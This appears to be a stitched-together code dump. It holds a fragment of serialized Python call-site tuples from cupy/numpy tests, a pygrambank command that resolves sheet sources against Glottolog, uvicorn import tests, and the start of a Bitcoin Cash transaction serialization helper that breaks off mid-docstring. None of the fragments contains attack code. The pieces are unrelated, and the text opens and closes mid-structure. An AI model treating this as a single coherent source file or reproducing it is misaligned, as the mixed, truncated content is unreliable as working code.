{'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (16861, 16886), False, 'from tests.third_party.cupy import testing\n'), ((17067, 17106), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (17089, 17106), False, 'from tests.third_party.cupy import testing\n'), ((17112, 17164), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {'accept_error': 'ValueError'}), '(accept_error=ValueError)\n', (17139, 17164), False, 'from tests.third_party.cupy import testing\n'), ((17352, 17391), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (17374, 17391), False, 'from tests.third_party.cupy import testing\n'), ((17397, 17426), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (17424, 17426), False, 'from tests.third_party.cupy import testing\n'), ((17580, 17619), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (17602, 17619), False, 'from tests.third_party.cupy import testing\n'), ((17625, 17654), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (17652, 17654), False, 'from tests.third_party.cupy import testing\n'), ((17803, 17842), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (17825, 17842), False, 'from tests.third_party.cupy import testing\n'), ((17848, 17877), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (17875, 17877), False, 'from tests.third_party.cupy import testing\n'), ((18026, 18065), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (18048, 18065), False, 'from tests.third_party.cupy import testing\n'), ((18071, 18100), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (18098, 18100), False, 'from tests.third_party.cupy import testing\n'), ((18249, 18288), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (18271, 18288), False, 'from tests.third_party.cupy import testing\n'), ((18294, 18323), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (18321, 18323), False, 'from tests.third_party.cupy import testing\n'), ((18454, 18493), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (18476, 18493), False, 'from tests.third_party.cupy import testing\n'), ((18713, 18752), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (18735, 18752), False, 'from tests.third_party.cupy import testing\n'), ((18993, 19032), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_complex': '(True)'}), '(no_complex=True)\n', (19015, 19032), False, 'from tests.third_party.cupy import testing\n'), ((19038, 19067), 'tests.third_party.cupy.testing.numpy_cupy_allclose', 'testing.numpy_cupy_allclose', ([], {}), '()\n', (19065, 19067), False, 'from tests.third_party.cupy import testing\n'), ((19844, 19880), 'tests.third_party.cupy.testing.for_all_dtypes', 'testing.for_all_dtypes', ([], {'no_bool': '(True)'}), '(no_bool=True)\n', (19866, 19880), False, 'from tests.third_party.cupy import testing\n'), ((19886, 19918), 'tests.third_party.cupy.testing.numpy_cupy_array_equal', 'testing.numpy_cupy_array_equal', ([], {}), '()\n', (19916, 19918), False, 'from tests.third_party.cupy import testing\n'), ((20264, 20296), 'tests.third_party.cupy.testing.numpy_cupy_array_equal', 'testing.numpy_cupy_array_equal', ([], {}), '()\n', (20294, 20296), False, 'from tests.third_party.cupy import testing\n'), ((20532, 20564), 'tests.third_party.cupy.testing.numpy_cupy_array_equal', 'testing.numpy_cupy_array_equal', ([], {}), '()\n', (20562, 20564), False, 'from tests.third_party.cupy import testing\n'), ((21977, 22009), 'tests.third_party.cupy.testing.numpy_cupy_array_equal', 'testing.numpy_cupy_array_equal', ([], {}), '()\n', (22007, 22009), False, 'from tests.third_party.cupy import testing\n'), ((22255, 22287), 'tests.third_party.cupy.testing.numpy_cupy_array_equal', 'testing.numpy_cupy_array_equal', ([], {}), '()\n', (22285, 22287), False, 'from tests.third_party.cupy import testing\n'), ((23030, 23062), 'tests.third_party.cupy.testing.numpy_cupy_array_equal', 'testing.numpy_cupy_array_equal', ([], {}), '()\n', (23060, 23062), False, 'from tests.third_party.cupy import testing\n'), ((332, 372), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3)', 'xp', 'dtype'], {}), '((2, 3), xp, dtype)\n', (353, 372), False, 'from tests.third_party.cupy import testing\n'), ((543, 583), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3)', 'xp', 'dtype'], {}), '((2, 3), xp, dtype)\n', (564, 583), False, 'from tests.third_party.cupy import testing\n'), ((977, 1020), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(3, 1000)', 'xp', 'dtype'], {}), '((3, 1000), xp, dtype)\n', (998, 1020), False, 'from tests.third_party.cupy import testing\n'), ((1204, 1247), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(3, 1000)', 'xp', 'dtype'], {}), '((3, 1000), xp, dtype)\n', (1225, 1247), False, 'from tests.third_party.cupy import testing\n'), ((1421, 1464), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (1442, 1464), False, 'from tests.third_party.cupy import testing\n'), ((1634, 1677), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (1655, 1677), False, 'from tests.third_party.cupy import testing\n'), ((1847, 1890), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (1868, 1890), False, 'from tests.third_party.cupy import testing\n'), ((2781, 2821), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (2802, 2821), False, 'from tests.third_party.cupy import testing\n'), ((2989, 3029), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3)', 'xp', 'dtype'], {}), '((2, 3), xp, dtype)\n', (3010, 3029), False, 'from tests.third_party.cupy import testing\n'), ((3423, 3463), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3)', 'xp', 'dtype'], {}), '((2, 3), xp, dtype)\n', (3444, 3463), False, 'from tests.third_party.cupy import testing\n'), ((3634, 3677), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(3, 1000)', 'xp', 'dtype'], {}), '((3, 1000), xp, dtype)\n', (3655, 3677), False, 'from tests.third_party.cupy import testing\n'), ((3861, 3904), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(3, 1000)', 'xp', 'dtype'], {}), '((3, 1000), xp, dtype)\n', (3882, 3904), False, 'from tests.third_party.cupy import testing\n'), ((4078, 4121), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (4099, 4121), False, 'from tests.third_party.cupy import testing\n'), ((4291, 4334), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (4312, 4334), False, 'from tests.third_party.cupy import testing\n'), ((4504, 4547), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (4525, 4547), False, 'from tests.third_party.cupy import testing\n'), ((5445, 5485), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (5466, 5485), False, 'from tests.third_party.cupy import testing\n'), ((8077, 8126), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.shape', 'cupy', 'in_dtype'], {}), '(self.shape, cupy, in_dtype)\n', (8098, 8126), False, 'from tests.third_party.cupy import testing\n'), ((7677, 7779), 'tests.third_party.cupy.testing.product', 'testing.product', (["{'func': ['argmin', 'argmax'], 'is_module': [True, False], 'shape': [(3, 4),\n ()]}"], {}), "({'func': ['argmin', 'argmax'], 'is_module': [True, False],\n 'shape': [(3, 4), ()]})\n", (7692, 7779), False, 'from tests.third_party.cupy import testing\n'), ((8981, 9033), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.cond_shape', 'xp', 'xp.bool_'], {}), '(self.cond_shape, xp, xp.bool_)\n', (9002, 9033), False, 'from tests.third_party.cupy import testing\n'), ((9252, 9307), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.x_shape', 'xp', 'x_type'], {'seed': '(0)'}), '(self.x_shape, xp, x_type, seed=0)\n', (9273, 9307), False, 'from tests.third_party.cupy import testing\n'), ((9320, 9375), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.y_shape', 'xp', 'y_type'], {'seed': '(1)'}), '(self.y_shape, xp, y_type, seed=1)\n', (9341, 9375), False, 'from tests.third_party.cupy import testing\n'), ((9731, 9783), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.cond_shape', 'xp', 'xp.bool_'], {}), '(self.cond_shape, xp, xp.bool_)\n', (9752, 9783), False, 'from tests.third_party.cupy import testing\n'), ((10255, 10272), 'numpy.empty', 'numpy.empty', (['(0,)'], {}), '((0,))\n', (10266, 10272), False, 'import numpy\n'), ((10289, 10308), 'numpy.empty', 'numpy.empty', (['(0, 2)'], {}), '((0, 2))\n', (10300, 10308), False, 'import numpy\n'), ((10325, 10347), 'numpy.empty', 'numpy.empty', (['(0, 2, 0)'], {}), '((0, 2, 0))\n', (10336, 10347), False, 'import numpy\n'), ((10633, 10647), 'numpy.array', 'numpy.array', (['(0)'], {}), '(0)\n', (10644, 10647), False, 'import numpy\n'), ((10664, 10678), 'numpy.array', 'numpy.array', (['(1)'], {}), '(1)\n', (10675, 10678), False, 'import numpy\n'), ((11065, 11079), 'numpy.array', 'numpy.array', (['(0)'], {}), '(0)\n', (11076, 11079), False, 'import numpy\n'), ((11096, 11110), 'numpy.array', 'numpy.array', (['(1)'], {}), '(1)\n', (11107, 11110), False, 'import numpy\n'), ((11127, 11144), 'numpy.empty', 'numpy.empty', (['(0,)'], {}), '((0,))\n', (11138, 11144), False, 'import numpy\n'), ((11161, 11180), 'numpy.empty', 'numpy.empty', (['(0, 2)'], {}), '((0, 2))\n', (11172, 11180), False, 'import numpy\n'), ((11197, 11219), 'numpy.empty', 'numpy.empty', (['(0, 2, 0)'], {}), '((0, 2, 0))\n', (11208, 11219), False, 'import numpy\n'), ((11517, 11534), 'numpy.empty', 'numpy.empty', (['(0,)'], {}), '((0,))\n', (11528, 11534), False, 'import numpy\n'), ((11551, 11570), 'numpy.empty', 'numpy.empty', (['(0, 2)'], {}), '((0, 2))\n', (11562, 11570), False, 'import numpy\n'), ((11587, 11609), 'numpy.empty', 'numpy.empty', (['(0, 2, 0)'], {}), '((0, 2, 0))\n', (11598, 11609), False, 'import numpy\n'), ((12544, 12584), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3)', 'xp', 'dtype'], {}), '((2, 3), xp, dtype)\n', (12565, 12584), False, 'from tests.third_party.cupy import testing\n'), ((14058, 14101), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(3, 1000)', 'xp', 'dtype'], {}), '((3, 1000), xp, dtype)\n', (14079, 14101), False, 'from tests.third_party.cupy import testing\n'), ((14281, 14324), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (14302, 14324), False, 'from tests.third_party.cupy import testing\n'), ((14504, 14547), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (14525, 14547), False, 'from tests.third_party.cupy import testing\n'), ((14727, 14770), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (14748, 14770), False, 'from tests.third_party.cupy import testing\n'), ((15704, 15744), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (15725, 15744), False, 'from tests.third_party.cupy import testing\n'), ((15977, 16017), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3)', 'xp', 'dtype'], {}), '((2, 3), xp, dtype)\n', (15998, 16017), False, 'from tests.third_party.cupy import testing\n'), ((17491, 17534), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(3, 1000)', 'xp', 'dtype'], {}), '((3, 1000), xp, dtype)\n', (17512, 17534), False, 'from tests.third_party.cupy import testing\n'), ((17714, 17757), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (17735, 17757), False, 'from tests.third_party.cupy import testing\n'), ((17937, 17980), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (17958, 17980), False, 'from tests.third_party.cupy import testing\n'), ((18160, 18203), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'dtype'], {}), '((2, 3, 4), xp, dtype)\n', (18181, 18203), False, 'from tests.third_party.cupy import testing\n'), ((19137, 19177), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (19158, 19177), False, 'from tests.third_party.cupy import testing\n'), ((19975, 20019), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['self.shape', 'xp', 'dtype'], {}), '(self.shape, xp, dtype)\n', (19996, 20019), False, 'from tests.third_party.cupy import testing\n'), ((20354, 20398), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(10,)', 'xp', 'xp.float64'], {}), '((10,), xp, xp.float64)\n', (20375, 20398), False, 'from tests.third_party.cupy import testing\n'), ((20618, 20662), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(10,)', 'xp', 'xp.float64'], {}), '((10,), xp, xp.float64)\n', (20639, 20662), False, 'from tests.third_party.cupy import testing\n'), ((22063, 22107), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(10,)', 'xp', 'xp.float64'], {}), '((10,), xp, xp.float64)\n', (22084, 22107), False, 'from tests.third_party.cupy import testing\n'), ((22342, 22386), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(10,)', 'xp', 'xp.float64'], {}), '((10,), xp, xp.float64)\n', (22363, 22386), False, 'from tests.third_party.cupy import testing\n'), ((23106, 23150), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(12,)', 'xp', 'xp.float64'], {}), '((12,), xp, xp.float64)\n', (23127, 23150), False, 'from tests.third_party.cupy import testing\n'), ((2259, 2299), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (2280, 2299), False, 'from tests.third_party.cupy import testing\n'), ((2516, 2556), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (2537, 2556), False, 'from tests.third_party.cupy import testing\n'), ((4916, 4956), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (4937, 4956), False, 'from tests.third_party.cupy import testing\n'), ((5180, 5220), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (5201, 5220), False, 'from tests.third_party.cupy import testing\n'), ((9182, 9235), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.cond_shape', 'xp', 'cond_type'], {}), '(self.cond_shape, xp, cond_type)\n', (9203, 9235), False, 'from tests.third_party.cupy import testing\n'), ((9799, 9848), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['self.cond_shape', 'xp', 'dtype'], {}), '(self.cond_shape, xp, dtype)\n', (9820, 9848), False, 'from tests.third_party.cupy import testing\n'), ((10025, 10074), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(3, 4)', 'xp'], {'dtype': 'xp.bool_'}), '((3, 4), xp, dtype=xp.bool_)\n', (10046, 10074), False, 'from tests.third_party.cupy import testing\n'), ((10091, 10137), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(2, 3, 4)', 'xp', 'xp.int32'], {}), '((2, 3, 4), xp, xp.int32)\n', (10112, 10137), False, 'from tests.third_party.cupy import testing\n'), ((15157, 15197), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (15178, 15197), False, 'from tests.third_party.cupy import testing\n'), ((15422, 15462), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (15443, 15462), False, 'from tests.third_party.cupy import testing\n'), ((18590, 18630), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (18611, 18630), False, 'from tests.third_party.cupy import testing\n'), ((18855, 18895), 'tests.third_party.cupy.testing.shaped_random', 'testing.shaped_random', (['(0, 1)', 'xp', 'dtype'], {}), '((0, 1), xp, dtype)\n', (18876, 18895), False, 'from tests.third_party.cupy import testing\n'), ((22771, 22815), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(10,)', 'xp', 'xp.float64'], {}), '((10,), xp, xp.float64)\n', (22792, 22815), False, 'from tests.third_party.cupy import testing\n'), ((23391, 23435), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(12,)', 'xp', 'xp.float64'], {}), '((12,), xp, xp.float64)\n', (23412, 23435), False, 'from tests.third_party.cupy import testing\n'), ((23701, 23745), 'tests.third_party.cupy.testing.shaped_arange', 'testing.shaped_arange', (['(12,)', 'xp', 'xp.float64'], {}), '((12,), xp, xp.float64)\n', (23722, 23745), False, 'from tests.third_party.cupy import testing\n'), ((2317, 2342), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2330, 2342), False, 'import pytest\n'), ((2574, 2599), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (2587, 2599), False, 'import pytest\n'), ((4974, 4999), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (4987, 4999), False, 'import pytest\n'), ((5238, 5263), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (5251, 5263), False, 'import pytest\n'), ((10155, 10180), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (10168, 10180), False, 'import pytest\n'), ((10957, 10990), 'pytest.raises', 'pytest.raises', (['DeprecationWarning'], {}), '(DeprecationWarning)\n', (10970, 10990), False, 'import pytest\n'), ((15215, 15240), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (15228, 15240), False, 'import pytest\n'), ((15480, 15505), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (15493, 15505), False, 'import pytest\n'), ((18648, 18673), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (18661, 18673), False, 'import pytest\n'), ((18913, 18938), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (18926, 18938), False, 'import pytest\n'), ((22888, 22913), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (22901, 22913), False, 'import pytest\n'), ((23534, 23559), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (23547, 23559), False, 'import pytest\n'), ((23861, 23885), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (23874, 23885), False, 'import pytest\n')]
|
"""
Lookup the references given in the `Source` column of a sheet in Glottolog hh.bib or the Grambank bib.
"""
import pathlib
import collections
from termcolor import colored
from cldfcatalog import Catalog
from pygrambank.sheet import Sheet
from pygrambank.cldf import refs
def register(parser):
parser.add_argument(
'glottolog',
metavar='GLOTTOLOG',
help="clone of glottolog/glottolog",
type=pathlib.Path,
)
parser.add_argument(
'sheet',
type=pathlib.Path,
)
parser.add_argument(
'--glottolog-version',
default=None,
help="tag to checkout glottolog/glottolog to",
)
def run(args):
if args.glottolog_version: # pragma: no cover
with Catalog(args.glottolog, args.glottolog_version) as glottolog:
run_(args, glottolog.dir)
else: # pragma: no cover
run_(args, args.glottolog)
def run_(args, glottolog): # pragma: no cover
sources, unresolved, lgks = refs(args.repos, glottolog, Sheet(args.sheet))
seen = collections.defaultdict(list)
print(colored('Resolved sources:', attrs=['bold']))
for src in sources:
seen[src.id].append(src)
for srcid, srcs in seen.items():
print('{}\t{}\t{}'.format(len(srcs), srcid, srcs[0]))
if unresolved:
print()
print(colored('Unresolved sources:', attrs=['bold']))
for spec, v in unresolved.most_common():
try:
author, year, code = spec
print('{}\t{} {}'.format(v, author, year))
except ValueError:
print(spec)
if lgks:
print()
print(colored('Available sources:', attrs=['bold']))
for (k, t, a, y) in lgks:
print('{}\t{}\t{}'.format(
colored(k, color='blue'),
t,
colored('{} {}'.format(a, y), attrs=['bold'])))
print()
print(colored('FAIL' if unresolved else 'OK', color='red' if unresolved else 'green'))
|
[
"collections.defaultdict",
"termcolor.colored",
"pygrambank.sheet.Sheet",
"cldfcatalog.Catalog"
] |
[((1053, 1082), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (1076, 1082), False, 'import collections\n'), ((1023, 1040), 'pygrambank.sheet.Sheet', 'Sheet', (['args.sheet'], {}), '(args.sheet)\n', (1028, 1040), False, 'from pygrambank.sheet import Sheet\n'), ((1093, 1137), 'termcolor.colored', 'colored', (['"""Resolved sources:"""'], {'attrs': "['bold']"}), "('Resolved sources:', attrs=['bold'])\n", (1100, 1137), False, 'from termcolor import colored\n'), ((1960, 2039), 'termcolor.colored', 'colored', (["('FAIL' if unresolved else 'OK')"], {'color': "('red' if unresolved else 'green')"}), "('FAIL' if unresolved else 'OK', color='red' if unresolved else 'green')\n", (1967, 2039), False, 'from termcolor import colored\n'), ((749, 796), 'cldfcatalog.Catalog', 'Catalog', (['args.glottolog', 'args.glottolog_version'], {}), '(args.glottolog, args.glottolog_version)\n', (756, 796), False, 'from cldfcatalog import Catalog\n'), ((1344, 1390), 'termcolor.colored', 'colored', (['"""Unresolved sources:"""'], {'attrs': "['bold']"}), "('Unresolved sources:', attrs=['bold'])\n", (1351, 1390), False, 'from termcolor import colored\n'), ((1673, 1718), 'termcolor.colored', 'colored', (['"""Available sources:"""'], {'attrs': "['bold']"}), "('Available sources:', attrs=['bold'])\n", (1680, 1718), False, 'from termcolor import colored\n'), ((1821, 1845), 'termcolor.colored', 'colored', (['k'], {'color': '"""blue"""'}), "(k, color='blue')\n", (1828, 1845), False, 'from termcolor import colored\n')]
|
import pytest
from uvicorn.importer import ImportFromStringError, import_from_string
def test_invalid_format() -> None:
with pytest.raises(ImportFromStringError) as exc_info:
import_from_string("example:")
expected = 'Import string "example:" must be in format "<module>:<attribute>".'
assert expected in str(exc_info.value)
def test_invalid_module() -> None:
with pytest.raises(ImportFromStringError) as exc_info:
import_from_string("module_does_not_exist:myattr")
expected = 'Could not import module "module_does_not_exist".'
assert expected in str(exc_info.value)
def test_invalid_attr() -> None:
with pytest.raises(ImportFromStringError) as exc_info:
import_from_string("tempfile:attr_does_not_exist")
expected = 'Attribute "attr_does_not_exist" not found in module "tempfile".'
assert expected in str(exc_info.value)
def test_internal_import_error() -> None:
with pytest.raises(ImportError):
import_from_string("tests.importer.raise_import_error:myattr")
def test_valid_import() -> None:
instance = import_from_string("tempfile:TemporaryFile")
from tempfile import TemporaryFile
assert instance == TemporaryFile
def test_no_import_needed() -> None:
from tempfile import TemporaryFile
instance = import_from_string(TemporaryFile)
assert instance == TemporaryFile
|
[
"pytest.raises",
"uvicorn.importer.import_from_string"
] |
[((1091, 1135), 'uvicorn.importer.import_from_string', 'import_from_string', (['"""tempfile:TemporaryFile"""'], {}), "('tempfile:TemporaryFile')\n", (1109, 1135), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n'), ((1307, 1340), 'uvicorn.importer.import_from_string', 'import_from_string', (['TemporaryFile'], {}), '(TemporaryFile)\n', (1325, 1340), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n'), ((132, 168), 'pytest.raises', 'pytest.raises', (['ImportFromStringError'], {}), '(ImportFromStringError)\n', (145, 168), False, 'import pytest\n'), ((190, 220), 'uvicorn.importer.import_from_string', 'import_from_string', (['"""example:"""'], {}), "('example:')\n", (208, 220), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n'), ((394, 430), 'pytest.raises', 'pytest.raises', (['ImportFromStringError'], {}), '(ImportFromStringError)\n', (407, 430), False, 'import pytest\n'), ((452, 502), 'uvicorn.importer.import_from_string', 'import_from_string', (['"""module_does_not_exist:myattr"""'], {}), "('module_does_not_exist:myattr')\n", (470, 502), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n'), ((656, 692), 'pytest.raises', 'pytest.raises', (['ImportFromStringError'], {}), '(ImportFromStringError)\n', (669, 692), False, 'import pytest\n'), ((714, 764), 'uvicorn.importer.import_from_string', 'import_from_string', (['"""tempfile:attr_does_not_exist"""'], {}), "('tempfile:attr_does_not_exist')\n", (732, 764), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n'), ((942, 968), 'pytest.raises', 'pytest.raises', (['ImportError'], {}), '(ImportError)\n', (955, 968), False, 'import pytest\n'), ((978, 1040), 'uvicorn.importer.import_from_string', 'import_from_string', (['"""tests.importer.raise_import_error:myattr"""'], {}), "('tests.importer.raise_import_error:myattr')\n", (996, 1040), False, 'from uvicorn.importer import ImportFromStringError, import_from_string\n')]
|
"""
Minimal bitcoin cash transaction stuff for making weird smart contracts
"""
from collections import namedtuple
import struct
import hashlib
from itertools import chain
### Transactions stuff
zero32 = b'\0'*32
SIGHASH_ALL = 1
SIGHASH_NONE = 2
SIGHASH_SINGLE = 3
SIGHASH_FORKID = 0x40
SIGHASH_ANYONECANPAY = 0x80
default_hashtype = SIGHASH_ALL|SIGHASH_FORKID
def sha256(b):
return hashlib.sha256(b).digest()
def rip160(b):
ripemd = hashlib.new('ripemd160')
ripemd.update(b)
return ripemd.digest()
def hash160(b):
return rip160(sha256(b))
def hash256(b):
return sha256(sha256(b))
# Convert python int to 1,2,4,8-byte little endian unsigned integers.
# Input range is checked.
# These are the fastest way I know of (better than calling bytes() or using int.to_bytes).
int_to_ubyte = struct.Struct('B').pack
int_to_ule2 = struct.Struct('<H').pack
int_to_ule4 = struct.Struct('<L').pack
int_to_ule8 = struct.Struct('<Q').pack
# These functions take in bytes, offset and return (integer, new_offset)
def structreader1(format):
s = struct.Struct(format)
slen = s.size
sunp = s.unpack_from
del s, format
def fun(b, offset):
data, = sunp(b, offset)
return data, offset+slen
return fun
read_ubyte = structreader1( 'B')
read_ule2 = structreader1('<H')
read_ule4 = structreader1('<L')
read_ule8 = structreader1('<Q')
def read_nbytes(b, n, offset):
new_offset = offset+n
res = bytes(b[offset : new_offset])
if len(res) != n:
raise struct.error("too few bytes")
return res, new_offset
def var_int(i):
"""Return bytes representation of bitcoin's variable length integers.
They are sometimes used for counters, sometimes used for byte lengths.
https://en.bitcoin.it/wiki/Protocol_specification#Variable_length_integer
"""
i = int(i)
if i<0xfd:
return bytes((i,))
elif i<=0xffff:
return b"\xfd"+int_to_ule2(i)
elif i<=0xffffffff:
return b"\xfe"+int_to_ule4(i)
else:
return b"\xff"+int_to_ule8(i)
def read_var_int(mv, offset):
""" Read var_int from offset and return new offset. """
b0 = mv[offset]
if b0 < 0xfd:
return b0, offset+1
elif b0 == 0xfd:
return read_ule2(mv, offset+1)
elif b0 == 0xfe:
return read_ule4(mv, offset+1)
elif b0 == 0xff:
return read_ule8(mv, offset+1)
class SimpleTx:
""" A lower-level bitcoin transaction ser/des.
This only uses bytes objects. It does not ever parse scripts, so
you can use all manner of weird scripts.
You can correctly calculate the preimages used in OP_CHECKSIG, for
any hashtype (SIGHASH ALL/NONE/SINGLE and/or ANYONECANPAY).
All `inputs` elements are dicts with 'prevout_hash' (bytes len 32),
'prevout_n' (int), 'prevout_value' (int), 'scriptsig' (bytes),
'sequence' (int).
'prevout_value' and 'scriptsig' are semi-optional, being needed by
different member functions.
